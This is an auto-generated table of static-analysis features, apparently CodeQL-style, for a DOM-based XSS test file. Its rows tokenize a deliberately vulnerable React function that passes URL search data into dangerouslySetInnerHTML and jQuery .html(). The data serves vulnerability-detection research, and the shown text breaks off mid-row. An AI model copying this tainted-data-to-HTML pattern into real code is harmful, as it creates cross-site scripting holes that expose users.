autogenerated/Xss/DomBasedXss/tst.js:207:26:207:46 | { taint ... inted } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:26:207:46 | { taint ... inted } | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:207:26:207:46 | { taint ... inted } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:26:207:46 | { taint ... inted } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:26:207:46 | { taint ... inted } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:35 | tainted3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:35 | tainted3 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:35 | tainted3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:35 | tainted3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:35 | tainted3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:28:207:44 | tainted3: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:207:38:207:44 | tainted | assignedToPropName | tainted3 | +| autogenerated/Xss/DomBasedXss/tst.js:207:38:207:44 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:207:38:207:44 | tainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:207:38:207:44 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:207:38:207:44 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:207:38:207:44 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:16 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:22 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:22 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:22 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:22 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:22 | this.state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:31 | this.state.tainted4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:31 | this.state.tainted4 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:31 | this.state.tainted4 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:31 | this.state.tainted4 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:31 | this.state.tainted4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:41 | this.st ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:41 | this.st ... tainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:41 | this.st ... tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:41 | this.st ... tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:208:13:208:41 | this.st ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:208:18:208:22 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:208:18:208:22 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:208:18:208:22 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:208:18:208:22 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:208:18:208:22 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:208:24:208:31 | tainted4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:208:24:208:31 | tainted4 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:208:24:208:31 | tainted4 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:208:24:208:31 | tainted4 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:208:24:208:31 | tainted4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:208:35:208:41 | tainted | assignedToPropName | tainted4 | +| autogenerated/Xss/DomBasedXss/tst.js:208:35:208:41 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:208:35:208:41 | tainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:208:35:208:41 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:208:35:208:41 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:208:35:208:41 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:211:12 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:211:12 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:211:12 | test | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:211:12 | test | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:211:12 | test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:9:220:9 | test() ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:211:13:211:12 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 